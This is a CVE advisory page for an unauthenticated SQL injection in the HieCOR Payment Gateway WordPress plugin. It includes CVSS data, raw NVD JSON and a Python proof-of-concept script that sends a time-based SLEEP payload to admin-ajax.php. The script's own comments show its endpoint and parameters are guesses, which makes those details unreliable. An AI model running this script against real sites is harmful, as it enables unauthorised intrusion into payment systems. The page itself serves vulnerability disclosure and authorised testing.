Security Vulnerability Report
中文
CVE-2025-52773 CVSS 9.3 CRITICAL

CVE-2025-52773

Published: 2025-11-06 16:15:55
Last Modified: 2026-04-27 17:16:27

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in hiecor HieCOR Payment Gateway Plugin hcv4-payment-gateway allows SQL Injection.This issue affects HieCOR Payment Gateway Plugin: from n/a through <= 1.5.11.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

HieCOR Payment Gateway Plugin (hcv4-payment-gateway) <= 1.5.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-52773 SQL Injection PoC # Target: HieCOR Payment Gateway Plugin <= 1.5.11 # Type: Unauthenticated SQL Injection def exploit_sql_injection(target_url): """ SQL Injection PoC for CVE-2025-52773 This PoC demonstrates time-based blind SQL injection """ # Vulnerable endpoint (typical WordPress AJAX handler) vulnerable_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # SQL injection payload - time-based blind injection # Modify the vulnerable parameter accordingly based on target payload = "' AND (SELECT * FROM (SELECT(SLEEP(5)))abc)-- -" # Common vulnerable parameters for payment gateway plugins params = { 'action': 'hcv4_payment_gateway_query', 'order_id': payload, 'customer_id': payload } print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-52773 SQL Injection...") print(f"[*] Payload: {payload}") try: response = requests.post(vulnerable_endpoint, data=params, timeout=10) if response.elapsed.total_seconds() >= 5: print("[+] SQL Injection confirmed! Server delayed response.") print(f"[+] Response time: {response.elapsed.total_seconds()}s") return True else: print("[-] No SQL injection detected or target not vulnerable") return False except requests.exceptions.Timeout: print("[+] SQL Injection confirmed! Server timed out as expected.") return True except Exception as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-52773.py <target_url>") print("Example: python cve-2025-52773.py http://example.com") sys.exit(1) target = sys.argv[1] exploit_sql_injection(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52773", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:15:54.933", "lastModified": "2026-04-27T17:16:27.473", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in hiecor HieCOR Payment Gateway Plugin hcv4-payment-gateway allows SQL Injection.This issue affects HieCOR Payment Gateway Plugin: from n/a through <= 1.5.11."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/hcv4-payment-gateway/vulnerability/wordpress-hiecor-payment-gateway-plugin-plugin-1-5-11-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}